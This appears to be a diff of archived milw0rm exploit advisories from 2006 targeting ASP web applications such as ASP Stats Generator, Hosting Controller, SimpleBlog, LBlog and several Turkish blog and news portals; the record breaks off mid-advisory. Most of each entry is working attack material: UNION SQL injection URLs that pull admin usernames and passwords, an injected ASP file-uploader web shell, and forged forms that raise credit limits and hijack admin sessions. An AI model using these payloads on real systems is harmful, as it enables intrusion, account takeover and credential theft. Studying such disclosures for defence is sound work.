||||
The information has been provided by Hamid Ebadi (IHS : IRAN HOMELAND SECURITY)
|
||||
The original article can be found at:
|
||||
|
||||
http://www.IHSteam.com
|
||||
http://www.hamid.ir/security/
|
||||
|
||||
|
||||
Vulnerable Systems:
|
||||
ASP Stats Generator 2.1.1 - 2.1 and below
|
||||
|
||||
SQL injection :
|
||||
|
||||
Example :
|
||||
The following URL can be used to trigger an SQL injection vulnerability in the pages.asp:
|
||||
http://localhost/myasg/pages.asp?order='&mese=1
|
||||
|
||||
Microsoft JET Database Engine error '80040e14'
|
||||
Syntax error in string in query expression 'SUM(Visits) ''.
|
||||
/myasg/pages.asp, line 236
|
||||
|
||||
Exploit :
|
||||
|
||||
http://localhost/asg/pages.asp?order=ASC union select sito_psw,1,1 from tblst_config&mese=1
|
||||
|
||||
|
||||
ASP Code Injection :
|
||||
Input passed to the strAsgSknPageBgColour (and ...) in "settings_skin.asp" isn't properly sanitised before being stored in the "inc_skin_file.asp".
|
||||
This can be exploited to inject arbitrary ASP code.
|
||||
|
||||
Exploit :
|
||||
|
||||
#F9F9F9" : dim path,hstr, mpath, content, filename: mpath=replace(Request.ServerVariables("PATH_TRANSLATED"),"/","\"): content = request("content"): filename = request("filename"): on error resume next: Dim objFSO,f: Set objFSO = Server.CreateObject ("Scripting.FileSystemObject"): if not filename = "" then: response.Write( "Have File.<BR>" ): path = objFSO.GetParentFolderName( mpath ): path = filename: end if: if not content="" then: response.Write( "Contented.<BR>" ): set f = objFSO.CreateTextFile( path ): response.Write( err.Description & "<BR>" ): f.Write( content ): response.Write( err.Description & "<BR>" ): f.close: end if %><%=filename%><BR><%=path%><BR><%= Request("path") %><BR><FORM ID="SForm" method="post"><TABLE width="300" border="1" ID="Table1"><TR><TD><P align="center"><STRONG><FONT size="6">Upload File</FONT></STRONG></P></TD></TR><TR><TD><TEXTAREA name="content" rows="15" cols="46" ><%=content%></textarea></TD></TR><TR><TD><P align="center">File Name:<%=strAsgMapPathTo%><INPUT type="text" name="filename" value="<%=filename%>" ></P><P align="center"><INPUT type="submit" value="Upload" ID="Submit1" NAME="Submit1"></P></TD></TR></TABLE></FORM><% objFSO = Nothing: on error goto 0: hstr = "
|
||||
[m.r.roohian]
|
||||
attacker can upload "cmd.asp" with this uploader and ...
|
||||
|
||||
|
||||
Solution:
|
||||
use ASP Stats Generator v2.1.2 (18/06/2006 )
|
||||
|
||||
# milw0rm.com [2006-06-19]
|
||||
|
|
|
@ -1,181 +1,181 @@
|
|||
Title: An attacker can gain reseller privileges and after that can gain admin privileges
|
||||
Version: 6.1 Hotfix <= 3.1
|
||||
Developer url: www.Hostingcontroller.com
|
||||
Solution: Update to Hotfix 3.2
|
||||
Discover date: 2005,Summer
|
||||
Report date (to hc company): Sat Jun 10, 2006
|
||||
Publish date (in security forums): Thu July 06, 2006
|
||||
|
||||
-------------------------------------------------------------------------------------
|
||||
===============================================
|
||||
1- This code give resadmin session to a user:
|
||||
Bug in "hosting/addreseller.asp", No checker is available.
|
||||
---------------------------------------------------
|
||||
|
||||
<script>
|
||||
function siteaction(){
|
||||
n_act= "/hosting/addreseller.asp?htype=3"
|
||||
window.document.all.frm1.action = window.document.all.siteact.value + n_act
|
||||
window.document.all.frm1.submit()
|
||||
}
|
||||
</script>
|
||||
<hr><br>
|
||||
Form1<br>
|
||||
URL: <input type="text" name=siteact size=70>
|
||||
<br>
|
||||
<form name="frm1" method="post" onsubmit="return siteaction()">
|
||||
<table>
|
||||
<tr>
|
||||
<td>reseller</td>
|
||||
<td><input type="text" name="reseller" value="hcadmin"></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>loginname</td>
|
||||
<td><input type="text" name="loginname" value="hcadmin"></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>Password</td>
|
||||
<td><input type="text" name="Password" value=""></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>first_name</td>
|
||||
<td><input type="text" name="first_name" value=""></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>first_name</td>
|
||||
<td><input type="text" name="first_name" value=""></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>last_name</td>
|
||||
<td><input type="text" name="last_name" value=""></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>address</td>
|
||||
<td><input type="text" name="address" value=""></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>city</td>
|
||||
<td><input type="text" name="city" value=""></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>state</td>
|
||||
<td><input type="text" name="state" value=""></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>country</td>
|
||||
<td><input type="text" name="country" value=""></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>email</td>
|
||||
<td><input type="text" name="email" value=""></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>phone</td>
|
||||
<td><input type="text" name="phone" value=""></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>fax</td>
|
||||
<td><input type="text" name="fax" value=""></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>zip</td>
|
||||
<td><input type="text" name="zip" value=""></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>selMonth</td>
|
||||
<td><input type="text" name="selMonth" value=""></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>selYear</td>
|
||||
<td><input type="text" name="selYear" value=""></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>txtcardno</td>
|
||||
<td><input type="text" name="txtcardno" value=""></td>
|
||||
</tr>
|
||||
</table>
|
||||
<br><input type="submit">
|
||||
</form>
|
||||
---------------------------------------------------
|
||||
===============================================
|
||||
2- This code list all of resellers then you must change a password of one of them then login by it for next step.
|
||||
Note: Also by this code, everyone can increase its Credit value then buy every host.
|
||||
---------------------------------------------------
|
||||
<form action="http://[URL]/Admin/Accounts/AccountActions.asp?ActionType=UpdateCreditLimit" method="post">
|
||||
<table>
|
||||
<tr>
|
||||
<td>Username:</td>
|
||||
<td><input type="text" name="UserName" value="hcadmin"></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>Description:</td>
|
||||
<td><input type="text" name="Description" value=""></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>FullName:</td>
|
||||
<td><input type="text" name="FullName" value=""></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>AccountDisabled 1,[blank]:</td>
|
||||
<td><input type="text" name="AccountDisabled" value=""></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>UserChangePassword:</td>
|
||||
<td><input type="text" name="UserChangePassword" value=""></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>PassCheck=TRUE,0:</td>
|
||||
<td><input type="text" name="PassCheck" value="0"></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>New Password:</td>
|
||||
<td><input type="text" name="Pass1" value=""></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>DefaultDiscount%:</td>
|
||||
<td><input type="text" name="DefaultDiscount" value="100"></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>CreditLimit:</td>
|
||||
<td><input type="text" name="CreditLimit" value="99999"></td>
|
||||
</tr>
|
||||
</table>
|
||||
<br><input type="submit">
|
||||
</form>
|
||||
<hr><br>
|
||||
---------------------------------------------------
|
||||
===============================================
|
||||
3- Now you must login by a resseler that changed password from last step. now goto userlist, if there is a user that will enough and if no user available, u must make it!
|
||||
now select it and click Enter to enter by that user. now the bug will be available:
|
||||
each reseller can gain every user session even "HCADMIN" by bug in "Check_Password.asp"
|
||||
below code will help you:
|
||||
---------------------------------------------------
|
||||
<hr><br>
|
||||
Form1<br>
|
||||
<form action="http://[URL]/Admin/Check_Password.asp" method="post">
|
||||
<table>
|
||||
<tr>
|
||||
<td>AdName</td>
|
||||
<td><input type="text" name="AdName" value="hcadmin"></td>
|
||||
</tr>
|
||||
</table>
|
||||
<br><input type="submit">
|
||||
</form>
|
||||
<hr><br>
|
||||
---------------------------------------------------
|
||||
===============================================
|
||||
|
||||
-------------------------------------------------------------------------------------
|
||||
|
||||
Finder: Soroush Dalili (http://www.google.com/search?hl=en&q="soroush+dalili")
|
||||
Email: Irsdl[47]Yahoo[d07]com
|
||||
Team: GSG (Grayhatz Security Group) [Grayhatz.net]
|
||||
Thanks from:
|
||||
Farhad Saaedi (farhadjokers[4t]yahoo[d0t]com)
|
||||
Small.Mouse from Shabgard.org (small.mouse[4t]yahoo[d0t]com)
|
||||
Kahkeshan Co. (IT Department) (www.kahkeshan.com)
|
||||
Related URLs:
|
||||
http://hidesys.persiangig.com/other/HC_BUGS_BEFORE3.2.txt (all hc bugs by Irsdl)
|
||||
http://hidesys.persiangig.com/other/HC%20Hack%20Prog.rar [password: grayhatz.net] (HC automation hacking program source code by simple VB)
|
||||
|
||||
# milw0rm.com [2006-07-06]
|
||||
Title: An attacker can gain reseller privileges and after that can gain admin privileges
|
||||
Version: 6.1 Hotfix <= 3.1
|
||||
Developer url: www.Hostingcontroller.com
|
||||
Solution: Update to Hotfix 3.2
|
||||
Discover date: 2005,Summer
|
||||
Report date (to hc company): Sat Jun 10, 2006
|
||||
Publish date (in security forums): Thu July 06, 2006
|
||||
|
||||
-------------------------------------------------------------------------------------
|
||||
===============================================
|
||||
1- This code give resadmin session to a user:
|
||||
Bug in "hosting/addreseller.asp", No checker is available.
|
||||
---------------------------------------------------
|
||||
|
||||
<script>
|
||||
function siteaction(){
|
||||
n_act= "/hosting/addreseller.asp?htype=3"
|
||||
window.document.all.frm1.action = window.document.all.siteact.value + n_act
|
||||
window.document.all.frm1.submit()
|
||||
}
|
||||
</script>
|
||||
<hr><br>
|
||||
Form1<br>
|
||||
URL: <input type="text" name=siteact size=70>
|
||||
<br>
|
||||
<form name="frm1" method="post" onsubmit="return siteaction()">
|
||||
<table>
|
||||
<tr>
|
||||
<td>reseller</td>
|
||||
<td><input type="text" name="reseller" value="hcadmin"></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>loginname</td>
|
||||
<td><input type="text" name="loginname" value="hcadmin"></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>Password</td>
|
||||
<td><input type="text" name="Password" value=""></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>first_name</td>
|
||||
<td><input type="text" name="first_name" value=""></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>first_name</td>
|
||||
<td><input type="text" name="first_name" value=""></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>last_name</td>
|
||||
<td><input type="text" name="last_name" value=""></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>address</td>
|
||||
<td><input type="text" name="address" value=""></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>city</td>
|
||||
<td><input type="text" name="city" value=""></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>state</td>
|
||||
<td><input type="text" name="state" value=""></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>country</td>
|
||||
<td><input type="text" name="country" value=""></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>email</td>
|
||||
<td><input type="text" name="email" value=""></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>phone</td>
|
||||
<td><input type="text" name="phone" value=""></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>fax</td>
|
||||
<td><input type="text" name="fax" value=""></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>zip</td>
|
||||
<td><input type="text" name="zip" value=""></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>selMonth</td>
|
||||
<td><input type="text" name="selMonth" value=""></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>selYear</td>
|
||||
<td><input type="text" name="selYear" value=""></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>txtcardno</td>
|
||||
<td><input type="text" name="txtcardno" value=""></td>
|
||||
</tr>
|
||||
</table>
|
||||
<br><input type="submit">
|
||||
</form>
|
||||
---------------------------------------------------
|
||||
===============================================
|
||||
2- This code list all of resellers then you must change a password of one of them then login by it for next step.
|
||||
Note: Also by this code, everyone can increase its Credit value then buy every host.
|
||||
---------------------------------------------------
|
||||
<form action="http://[URL]/Admin/Accounts/AccountActions.asp?ActionType=UpdateCreditLimit" method="post">
|
||||
<table>
|
||||
<tr>
|
||||
<td>Username:</td>
|
||||
<td><input type="text" name="UserName" value="hcadmin"></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>Description:</td>
|
||||
<td><input type="text" name="Description" value=""></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>FullName:</td>
|
||||
<td><input type="text" name="FullName" value=""></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>AccountDisabled 1,[blank]:</td>
|
||||
<td><input type="text" name="AccountDisabled" value=""></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>UserChangePassword:</td>
|
||||
<td><input type="text" name="UserChangePassword" value=""></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>PassCheck=TRUE,0:</td>
|
||||
<td><input type="text" name="PassCheck" value="0"></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>New Password:</td>
|
||||
<td><input type="text" name="Pass1" value=""></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>DefaultDiscount%:</td>
|
||||
<td><input type="text" name="DefaultDiscount" value="100"></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>CreditLimit:</td>
|
||||
<td><input type="text" name="CreditLimit" value="99999"></td>
|
||||
</tr>
|
||||
</table>
|
||||
<br><input type="submit">
|
||||
</form>
|
||||
<hr><br>
|
||||
---------------------------------------------------
|
||||
===============================================
|
||||
3- Now you must login by a resseler that changed password from last step. now goto userlist, if there is a user that will enough and if no user available, u must make it!
|
||||
now select it and click Enter to enter by that user. now the bug will be available:
|
||||
each reseller can gain every user session even "HCADMIN" by bug in "Check_Password.asp"
|
||||
below code will help you:
|
||||
---------------------------------------------------
|
||||
<hr><br>
|
||||
Form1<br>
|
||||
<form action="http://[URL]/Admin/Check_Password.asp" method="post">
|
||||
<table>
|
||||
<tr>
|
||||
<td>AdName</td>
|
||||
<td><input type="text" name="AdName" value="hcadmin"></td>
|
||||
</tr>
|
||||
</table>
|
||||
<br><input type="submit">
|
||||
</form>
|
||||
<hr><br>
|
||||
---------------------------------------------------
|
||||
===============================================
|
||||
|
||||
-------------------------------------------------------------------------------------
|
||||
|
||||
Finder: Soroush Dalili (http://www.google.com/search?hl=en&q="soroush+dalili")
|
||||
Email: Irsdl[47]Yahoo[d07]com
|
||||
Team: GSG (Grayhatz Security Group) [Grayhatz.net]
|
||||
Thanks from:
|
||||
Farhad Saaedi (farhadjokers[4t]yahoo[d0t]com)
|
||||
Small.Mouse from Shabgard.org (small.mouse[4t]yahoo[d0t]com)
|
||||
Kahkeshan Co. (IT Department) (www.kahkeshan.com)
|
||||
Related URLs:
|
||||
http://hidesys.persiangig.com/other/HC_BUGS_BEFORE3.2.txt (all hc bugs by Irsdl)
|
||||
http://hidesys.persiangig.com/other/HC%20Hack%20Prog.rar [password: grayhatz.net] (HC automation hacking program source code by simple VB)
|
||||
|
||||
# milw0rm.com [2006-07-06]
|
||||
|
|
|
@ -1,12 +1,12 @@
|
|||
#YenerTurk Haber Script v1.0 SQL Injection Vulnebrality
|
||||
#Credit:ASIANEAGLE
|
||||
#Contact:admin@asianeagle.org
|
||||
|
||||
|
||||
#Exploit:
|
||||
Admin Nick:
|
||||
http://[SITE]/Path to YenerTurk/default.asp?x=2&kategori=11&id=-1%20union%20select%200,kullanici_adi,2,3,4,5,6,7,8%20from%20admin%20where%20id%20like%201
|
||||
Admin pass:
|
||||
http://[SITE]/Path to YenerTurk/default.asp?x=2&kategori=11&id=-1%20union%20select%200,sifre,2,3,4,5,6,7,8%20from%20admin%20where%20id%20like%201
|
||||
|
||||
# milw0rm.com [2006-08-07]
|
||||
#YenerTurk Haber Script v1.0 SQL Injection Vulnebrality
|
||||
#Credit:ASIANEAGLE
|
||||
#Contact:admin@asianeagle.org
|
||||
|
||||
|
||||
#Exploit:
|
||||
Admin Nick:
|
||||
http://[SITE]/Path to YenerTurk/default.asp?x=2&kategori=11&id=-1%20union%20select%200,kullanici_adi,2,3,4,5,6,7,8%20from%20admin%20where%20id%20like%201
|
||||
Admin pass:
|
||||
http://[SITE]/Path to YenerTurk/default.asp?x=2&kategori=11&id=-1%20union%20select%200,sifre,2,3,4,5,6,7,8%20from%20admin%20where%20id%20like%201
|
||||
|
||||
# milw0rm.com [2006-08-07]
|
||||
|
|
|
@ -1,22 +1,22 @@
|
|||
###############################################################
|
||||
#Spidey Blog Script <== 1.5 (tr) SQL Injection Vulnerability #
|
||||
#Author : ASIANEAGLE #
|
||||
#Site : www.asianeagle.org #
|
||||
#Contact: admin@asianeagle.org #
|
||||
###############################################################
|
||||
#Risk : High
|
||||
#Download Link Of Spidey Blog : http://www.aspindir.com/Kategoriler/ASP/bloglar
|
||||
|
||||
|
||||
#Exploit;
|
||||
#Admin Nick;
|
||||
http://[SITE]/[Spidey Blog Path]/proje_goster.asp?pid=-1%20union%20select%200,1,2,3,4,sifre,6%20from%20uyeler%20where%20id%20like%201
|
||||
|
||||
#Admin Password;
|
||||
http://[SITE]/[Spidey Blog Path]/proje_goster.asp?pid=-1%20union%20select%200,1,2,3,4,kullanici_adi,6%20from%20uyeler%20where%20id%20like%201
|
||||
|
||||
|
||||
#Greetz: Str0ke
|
||||
Forever milw0rm ;)
|
||||
|
||||
# milw0rm.com [2006-08-14]
|
||||
###############################################################
|
||||
#Spidey Blog Script <== 1.5 (tr) SQL Injection Vulnerability #
|
||||
#Author : ASIANEAGLE #
|
||||
#Site : www.asianeagle.org #
|
||||
#Contact: admin@asianeagle.org #
|
||||
###############################################################
|
||||
#Risk : High
|
||||
#Download Link Of Spidey Blog : http://www.aspindir.com/Kategoriler/ASP/bloglar
|
||||
|
||||
|
||||
#Exploit;
|
||||
#Admin Nick;
|
||||
http://[SITE]/[Spidey Blog Path]/proje_goster.asp?pid=-1%20union%20select%200,1,2,3,4,sifre,6%20from%20uyeler%20where%20id%20like%201
|
||||
|
||||
#Admin Password;
|
||||
http://[SITE]/[Spidey Blog Path]/proje_goster.asp?pid=-1%20union%20select%200,1,2,3,4,kullanici_adi,6%20from%20uyeler%20where%20id%20like%201
|
||||
|
||||
|
||||
#Greetz: Str0ke
|
||||
Forever milw0rm ;)
|
||||
|
||||
# milw0rm.com [2006-08-14]
|
||||
|
|
|
@ -1,27 +1,27 @@
|
|||
################################################################################
|
||||
## ##
|
||||
|
||||
## SimpleBlog 2.0 <= "comments.asp" SQL Injection Exploit ##
|
||||
|
||||
## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
|
||||
|
||||
## Credit by | Chironex Fleckeri ##
|
||||
|
||||
## Mail | ChironeX.FleckeriX@Gmail.Com ##
|
||||
|
||||
## Googledork | Powered By SimpleBlog 2.0 ##
|
||||
|
||||
## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
|
||||
|
||||
## ##
|
||||
################################################################################
|
||||
|
||||
############################################################################################################################################################
|
||||
#Usage : http://www.target.com/path/comments.asp?id=-1 UNION SELECT ID,uFULLNAME,uUSERNAME,uPASSWORD,uEMAIL,uDATECREATED,null,null FROM T_USERS WHERE id=1 #
|
||||
############################################################################################################################################################
|
||||
|
||||
###########################################################
|
||||
#Admin Panel : http://www.target.com/path/admin/login.asp #
|
||||
###########################################################
|
||||
|
||||
# milw0rm.com [2006-08-20]
|
||||
################################################################################
|
||||
## ##
|
||||
|
||||
## SimpleBlog 2.0 <= "comments.asp" SQL Injection Exploit ##
|
||||
|
||||
## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
|
||||
|
||||
## Credit by | Chironex Fleckeri ##
|
||||
|
||||
## Mail | ChironeX.FleckeriX@Gmail.Com ##
|
||||
|
||||
## Googledork | Powered By SimpleBlog 2.0 ##
|
||||
|
||||
## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
|
||||
|
||||
## ##
|
||||
################################################################################
|
||||
|
||||
############################################################################################################################################################
|
||||
#Usage : http://www.target.com/path/comments.asp?id=-1 UNION SELECT ID,uFULLNAME,uUSERNAME,uPASSWORD,uEMAIL,uDATECREATED,null,null FROM T_USERS WHERE id=1 #
|
||||
############################################################################################################################################################
|
||||
|
||||
###########################################################
|
||||
#Admin Panel : http://www.target.com/path/admin/login.asp #
|
||||
###########################################################
|
||||
|
||||
# milw0rm.com [2006-08-20]
|
||||
|
|
|
@ -1,27 +1,27 @@
|
|||
################################################################################
|
||||
## ##
|
||||
|
||||
## LBlog <= "comments.asp" SQL Injection Exploit ##
|
||||
|
||||
## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
|
||||
|
||||
## Credit by | Chironex Fleckeri ##
|
||||
|
||||
## Mail | ChironeX.FleckeriX@Gmail.Com ##
|
||||
|
||||
## Googledork | Powered By LBlog ##
|
||||
|
||||
## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
|
||||
|
||||
## ##
|
||||
################################################################################
|
||||
|
||||
###################################################################################################################
|
||||
#Usage : http://www.target.com/path/comments.asp?id=-1 UNION SELECT 0,username,password,3,4+FROM+LOGIN+WHERE+ID=1 #
|
||||
###################################################################################################################
|
||||
|
||||
#################################################
|
||||
#Admin Panel : http://www.target.com/path/admin #
|
||||
#################################################
|
||||
|
||||
# milw0rm.com [2006-08-20]
|
||||
################################################################################
|
||||
## ##
|
||||
|
||||
## LBlog <= "comments.asp" SQL Injection Exploit ##
|
||||
|
||||
## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
|
||||
|
||||
## Credit by | Chironex Fleckeri ##
|
||||
|
||||
## Mail | ChironeX.FleckeriX@Gmail.Com ##
|
||||
|
||||
## Googledork | Powered By LBlog ##
|
||||
|
||||
## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
|
||||
|
||||
## ##
|
||||
################################################################################
|
||||
|
||||
###################################################################################################################
|
||||
#Usage : http://www.target.com/path/comments.asp?id=-1 UNION SELECT 0,username,password,3,4+FROM+LOGIN+WHERE+ID=1 #
|
||||
###################################################################################################################
|
||||
|
||||
#################################################
|
||||
#Admin Panel : http://www.target.com/path/admin #
|
||||
#################################################
|
||||
|
||||
# milw0rm.com [2006-08-20]
|
||||
|
|
|
@ -1,16 +1,16 @@
|
|||
#Muratsoft Haber Portal v3.6 (tr) SQL Injection Vulnerability
|
||||
#Author : ASIANEAGLE
|
||||
#Site : www.asianeagle.org
|
||||
#Contact: admin@asianeagle.org
|
||||
|
||||
|
||||
#Link : http://www.aspindir.com/Goster/4350
|
||||
#Demo Portal : http://www.muratsoft.com/haber/www/
|
||||
#Price of Portal: 300YTL // Good money for Bad Script
|
||||
|
||||
#Exploit :
|
||||
www.site.com /[portal path]/kategori.asp?kat=-1%20union%20select%200,U_ADI,2,U_SIFRE,4,5,6,7,8,9,10,11,12,13,14%20from%20uyeler%20where%20U_ID%20like%201
|
||||
|
||||
#BURCU Seni hep sevdim hep sevicem.
|
||||
|
||||
# milw0rm.com [2006-09-03]
|
||||
#Muratsoft Haber Portal v3.6 (tr) SQL Injection Vulnerability
|
||||
#Author : ASIANEAGLE
|
||||
#Site : www.asianeagle.org
|
||||
#Contact: admin@asianeagle.org
|
||||
|
||||
|
||||
#Link : http://www.aspindir.com/Goster/4350
|
||||
#Demo Portal : http://www.muratsoft.com/haber/www/
|
||||
#Price of Portal: 300YTL // Good money for Bad Script
|
||||
|
||||
#Exploit :
|
||||
www.site.com /[portal path]/kategori.asp?kat=-1%20union%20select%200,U_ADI,2,U_SIFRE,4,5,6,7,8,9,10,11,12,13,14%20from%20uyeler%20where%20U_ID%20like%201
|
||||
|
||||
#BURCU Seni hep sevdim hep sevicem.
|
||||
|
||||
# milw0rm.com [2006-09-03]
|
||||
|
|
|
@ -1,74 +1,74 @@
|
|||
_ _
|
||||
__ _(_)_ __ ___| |_ __ _
|
||||
\ \ / / | '_ \/ __| __/ _` |
|
||||
\ V /| | |_) \__ \ || (_| |
|
||||
\_/ |_| .__/|___/\__\__,_|
|
||||
|_| AnD
|
||||
_ _ _ _ _
|
||||
_ __ ___ _ _ _ __ __| | ___ _ __ ___| | _(_) | |____
|
||||
| '_ ` _ \| | | | '__/ _` |/ _ \ '__/ __| |/ / | | |_ /
|
||||
| | | | | | |_| | | | (_| | __/ | \__ \ <| | | |/ /
|
||||
|_| |_| |_|\__,_|_| \__,_|\___|_| |___/_|\_\_|_|_/___|
|
||||
|
||||
+-----------------------------------------------------------------+
|
||||
| Vipsta & MurderSkillz fucking pwnt this webApp |
|
||||
+-----------------------------------------------------------------+
|
||||
| App Name: SimpleBlog 2.3 |
|
||||
| App Author: 8pixel.net |
|
||||
| App Version: <= 2.3 |
|
||||
| App Type: Blog/Journal |
|
||||
+-----------------------------------------------------------------+
|
||||
| DETAILS |
|
||||
+-----------------------------------------------------------------+
|
||||
| Vulnerability: Remote SQL Injection |
|
||||
| Requirements: Database with UNION support |
|
||||
| Revisions: Note - This is a revision of another vuln |
|
||||
| posted by Chironex Fleckeri |
|
||||
+-----------------------------------------------------------------+
|
||||
| CODE |
|
||||
+-----------------------------------------------------------------+
|
||||
| Vendor "implemented" a fix for SQL injection vulnerabilities. |
|
||||
| however this bullshit was easily worked around by |
|
||||
| Vipsta & MurderSkillz. |
|
||||
| |
|
||||
| Vendor attempted to remove illegal characters like ' and = |
|
||||
| which stop most SQL injection vulnerabilities. However: |
|
||||
| Vendor failed to remove '>' symbol. |
|
||||
+-----------------------------------------------------------------+
|
||||
| EXPLOIT |
|
||||
+-----------------------------------------------------------------+
|
||||
| SQL Injection String: |
|
||||
+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
|
||||
| http://[target]/[path]/default.asp?view=plink&id=-1%20UNION%20SELECT%20ID,uFULLNAME,uUSERNAME,uPASSWORD,uEMAIL,uDATECREATED,null,null,null%20FROM%20T_USERS%20WHERE%20id>1 |
|
||||
+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
|
||||
| TIMELINE |
|
||||
+-----------------------------------------------------------------+
|
||||
| 9/2/06 - Vendor Notified. |
|
||||
| 9/2/06 - Vendor Replied. Threatens legal action. |
|
||||
| 9/4/06 - Exploit Released with no details to vendor. |
|
||||
+-----------------------------------------------------------------+
|
||||
| SHOUTZ |
|
||||
+-----------------------------------------------------------------+
|
||||
| Everyone at g00ns.net - including: |
|
||||
| z3r0, spic, arya (aka nex, aka Lythex), FuRy, Mayo, |
|
||||
| TrinTITTY, 0ptix, scuzz, overdose, Cre@mpuff, Riot, |
|
||||
| JuNk, CeLe, LaD, NightSins, Zodiac, grumpy, FiSh, pr0be, |
|
||||
| ReysRaged, milf <3, gio, RedCoat, and all who I forgot! |
|
||||
+-----------------------------------------------------------------+
|
||||
| ADDITIONAL NOTES |
|
||||
+-----------------------------------------------------------------+
|
||||
| TeamSpeak: ts.g00ns.net |
|
||||
| IRC: irc.g00ns.net |
|
||||
+-----------------------------------------------------------------+
|
||||
| PERSONAL STUFF |
|
||||
+-----------------------------------------------------------------+
|
||||
| Sess from g00ns.net IS A FUCKING MORON. |
|
||||
+-----------------------------------------------------------------+
|
||||
|
||||
__
|
||||
___ ___ / _|
|
||||
/ _ \/ _ \| |_
|
||||
| __/ (_) | _|
|
||||
\___|\___/|_|.
|
||||
|
||||
# milw0rm.com [2006-09-04]
|
||||
_ _
|
||||
__ _(_)_ __ ___| |_ __ _
|
||||
\ \ / / | '_ \/ __| __/ _` |
|
||||
\ V /| | |_) \__ \ || (_| |
|
||||
\_/ |_| .__/|___/\__\__,_|
|
||||
|_| AnD
|
||||
_ _ _ _ _
|
||||
_ __ ___ _ _ _ __ __| | ___ _ __ ___| | _(_) | |____
|
||||
| '_ ` _ \| | | | '__/ _` |/ _ \ '__/ __| |/ / | | |_ /
|
||||
| | | | | | |_| | | | (_| | __/ | \__ \ <| | | |/ /
|
||||
|_| |_| |_|\__,_|_| \__,_|\___|_| |___/_|\_\_|_|_/___|
|
||||
|
||||
+-----------------------------------------------------------------+
|
||||
| Vipsta & MurderSkillz fucking pwnt this webApp |
|
||||
+-----------------------------------------------------------------+
|
||||
| App Name: SimpleBlog 2.3 |
|
||||
| App Author: 8pixel.net |
|
||||
| App Version: <= 2.3 |
|
||||
| App Type: Blog/Journal |
|
||||
+-----------------------------------------------------------------+
|
||||
| DETAILS |
|
||||
+-----------------------------------------------------------------+
|
||||
| Vulnerability: Remote SQL Injection |
|
||||
| Requirements: Database with UNION support |
|
||||
| Revisions: Note - This is a revision of another vuln |
|
||||
| posted by Chironex Fleckeri |
|
||||
+-----------------------------------------------------------------+
|
||||
| CODE |
|
||||
+-----------------------------------------------------------------+
|
||||
| Vendor "implemented" a fix for SQL injection vulnerabilities. |
|
||||
| however this bullshit was easily worked around by |
|
||||
| Vipsta & MurderSkillz. |
|
||||
| |
|
||||
| Vendor attempted to remove illegal characters like ' and = |
|
||||
| which stop most SQL injection vulnerabilities. However: |
|
||||
| Vendor failed to remove '>' symbol. |
|
||||
+-----------------------------------------------------------------+
|
||||
| EXPLOIT |
|
||||
+-----------------------------------------------------------------+
|
||||
| SQL Injection String: |
|
||||
+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
|
||||
| http://[target]/[path]/default.asp?view=plink&id=-1%20UNION%20SELECT%20ID,uFULLNAME,uUSERNAME,uPASSWORD,uEMAIL,uDATECREATED,null,null,null%20FROM%20T_USERS%20WHERE%20id>1 |
|
||||
+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
|
||||
| TIMELINE |
|
||||
+-----------------------------------------------------------------+
|
||||
| 9/2/06 - Vendor Notified. |
|
||||
